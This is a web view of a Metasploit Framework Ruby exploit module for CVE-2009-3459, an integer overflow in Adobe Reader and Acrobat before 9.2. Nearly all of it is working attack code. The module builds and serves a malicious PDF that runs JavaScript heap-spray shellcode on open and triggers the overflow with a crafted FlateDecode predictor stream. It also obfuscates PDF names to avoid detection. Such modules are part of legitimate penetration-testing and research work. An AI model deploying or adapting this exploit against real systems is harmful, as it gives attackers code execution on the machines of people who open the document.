CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb
Views: 11783
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'zlib'

7


8
class MetasploitModule < Msf::Exploit::Remote

9
  Rank = GoodRanking

10


11
  include Msf::Exploit::Remote::HttpServer::HTML

12


13
  def initialize(info = {})

14
    super(update_info(info,

15
      'Name'           => 'Adobe FlateDecode Stream Predictor 02 Integer Overflow',

16
      'Description'    => %q{

17
          This module exploits an integer overflow vulnerability in Adobe Reader and Adobe

18
        Acrobat Professional versions before 9.2.

19
      },

20
      'License'        => MSF_LICENSE,

21
      'Author'         =>

22
        [

23
          'unknown', # Found in the wild

24
          # Metasploit version by:

25
          'jduck',

26
          'jabra'

27
        ],

28
      'References'     =>

29
        [

30
          [ 'CVE', '2009-3459' ],

31
          [ 'BID', '36600' ],

32
          [ 'OSVDB', '58729' ],

33
          [ 'URL', 'http://blogs.adobe.com/psirt/2009/10/adobe_reader_and_acrobat_issue_1.html' ],

34
          [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb09-15.html' ]

35
        ],

36
      'DefaultOptions' =>

37
        {

38
          'EXITFUNC' => 'process',

39
        },

40
      'Payload'        =>

41
        {

42
          'Space'         => 1024,

43
          'BadChars'      => "\x00",

44
          'DisableNops'    => true

45
        },

46
      'Platform'       => 'win',

47
      'Targets'        =>

48
        [

49
          # test results (on Windows XP SP3)

50
          # reader 7.0.5 - untested

51
          # reader 7.0.8 - untested

52
          # reader 7.0.9 - untested

53
          # reader 7.1.0 - untested

54
          # reader 7.1.1 - untested

55
          # reader 8.0.0 - untested

56
          # reader 8.1.2 - untested

57
          # reader 8.1.3 - untested

58
          # reader 8.1.4 - untested

59
          # reader 8.1.5 - untested

60
          # reader 8.1.6 - untested

61
          # reader 9.0.0 - untested

62
          # reader 9.1.0 - works!

63
          # reader 9.2 - not vulnerable

64
          [ 'Adobe Reader Windows Universal (JS Heap Spray)',

65
            {

66
              'Size'      => ((1024*1024) - 32)

67
            }

68
          ],

69
        ],

70
      'DisclosureDate' => '2009-10-08',

71
      'DefaultTarget'  => 0))

72
  end

73


74
  def autofilter

75
    false

76
  end

77


78
  def check_dependencies

79
    use_zlib

80
  end

81


82
  def on_request_uri(cli, request)

83
    return if ((p = regenerate_payload(cli)) == nil)

84


85
    # Encode the shellcode.

86
    shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

87


88
    # Make some nops

89
    nops    = Rex::Text.to_unescape(make_nops(4))

90
    randnop = rand_text_alpha(rand(100) + 1)

91


92
    # Randomize variables

93
    rand1  = rand_text_alpha(rand(100) + 1)

94
    rand2  = rand_text_alpha(rand(100) + 1)

95


96
    script = %Q|

97
var #{rand1} = unescape("#{shellcode}");

98
var #{randnop} = "#{nops}";

99
var #{rand2} = unescape(#{randnop});

100
while (#{rand2}.length < #{target['Size']}) #{rand2} += #{rand2};

101
#{rand2} = #{rand2}.substring(0, #{target['Size']} - #{rand1}.length);

102
memory = new Array();

103
for(i = 0; i < 128; i++) { memory[i]= #{rand2} + #{rand1}; }

104
|

105
    # Create the pdf

106
    pdf = make_pdf(script)

107


108
    print_status("Sending #{self.name}")

109


110
    send_response(cli, pdf, { 'Content-Type' => 'application/pdf' })

111


112
    handler(cli)

113


114
  end

115


116
  def random_non_ascii_string(count)

117
    result = ""

118
    count.times do

119
      result << (rand(128) + 128).chr

120
    end

121
    result

122
  end

123


124
  def io_def(id)

125
    "%d 0 obj" % id

126
  end

127


128
  def io_ref(id)

129
    "%d 0 R" % id

130
  end

131


132
  #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/

133
  def n_obfu(str)

134
    result = ""

135
    str.scan(/./u) do |c|

136
      if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'

137
        result << "#%x" % c.unpack("C*")[0]

138
      else

139
        result << c

140
      end

141
    end

142
    result

143
  end

144


145
  def ascii_hex_whitespace_encode(str)

146
    result = ""

147
    whitespace = ""

148
    str.each_byte do |b|

149
      result << whitespace << "%02x" % b

150
      whitespace = " " * (rand(3) + 1)

151
    end

152
    result << ">"

153
  end

154


155
  def make_flate_data()

156


157
    # NOTE: this data is from the original, in-the-wild exploit...

158
    # on 9.1.0 xpsp3, this causes a crash executing 0x70000000

159
    # that's not exactly a fun address to try to heap spray to

160
    bpc = 1

161
    data = "\x00\x00\x20\x00\x00\x00\x10"

162


163
    # this way, we can adjust dwords on the heap by 8-bits of data..

164
    # this leads to eip being around 0x1000xxxx, much more friendly

165
    bpc = 8

166
    addend = 9

167
    data = "\x00" * 64

168
    data[18,1] = [addend].pack('C')

169
    data[51,1] = [addend].pack('C')

170


171
    return bpc, data

172
  end

173


174


175
  def make_pdf(js)

176


177
    xref = []

178
    eol = "\x0d\x0a"

179
    endobj = "endobj" << eol

180


181
    # Randomize PDF version?

182
    pdf = "%PDF-1.5" << eol

183
    pdf << "%" << random_non_ascii_string(4) << eol

184


185
    xref << pdf.length

186
    pdf << io_def(1) << n_obfu("<</Type/Catalog/Outlines ") << io_ref(2)

187
    pdf << n_obfu("/Pages ") << io_ref(3)

188
    pdf << n_obfu("/OpenAction ") << io_ref(5)

189
    pdf << ">>" << endobj

190


191
    xref << pdf.length

192
    pdf << io_def(2) << n_obfu("<</Type/Outlines/Count 0>>") << endobj

193


194
    xref << pdf.length

195
    pdf << io_def(3) << n_obfu("<</Type/Pages/Kids[") << io_ref(4) << n_obfu("]/Count 1>>") << endobj

196


197
    xref << pdf.length

198
    pdf << io_def(4) << n_obfu("<</Contents ") << io_ref(7)

199
    pdf << n_obfu("/Type/Page/Parent ") << io_ref(3) << n_obfu("/MediaBox[0 0 612 792]>>") << endobj

200


201
    xref << pdf.length

202
    pdf << io_def(5) << n_obfu("<</Type/Action/S/JavaScript/JS ") + io_ref(6) + ">>" << endobj

203


204
    xref << pdf.length

205
    compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))

206
    pdf << io_def(6) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol

207
    pdf << "stream" << eol

208
    pdf << compressed << eol

209
    pdf << "endstream" << eol

210
    pdf << endobj

211


212
    # generate data for inside the flate'd stream

213
    bits_per_component, data = make_flate_data()

214
    compressed = Zlib::Deflate.deflate(data)

215


216
    xref << pdf.length

217
    pdf << io_def(7) << n_obfu("<</DecodeParms")

218
    pdf << n_obfu("<</Columns 1/Predictor 02/Colors 1073741838/BitsPerComponent %s>>" % bits_per_component)

219
    pdf << n_obfu("/Length %s/Filter/FlateDecode>>" % compressed.length)

220
    pdf << "stream" << eol

221
    pdf << compressed << eol

222
    pdf << "endstream" << eol

223
    pdf << endobj

224


225
    xrefPosition = pdf.length

226
    pdf << "xref" << eol

227
    pdf << "0 %d" % (xref.length + 1) << eol

228
    pdf << "0000000000 65535 f" << eol

229
    xref.each do |index|

230
      pdf << "%010d 00000 n" % index << eol

231
    end

232
    pdf << "trailer" << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(1) << ">>" << eol

233
    pdf << "startxref" << eol

234
    pdf << xrefPosition.to_s() << eol

235
    pdf << "%%EOF" << eol

236


237
  end

238
end

239


240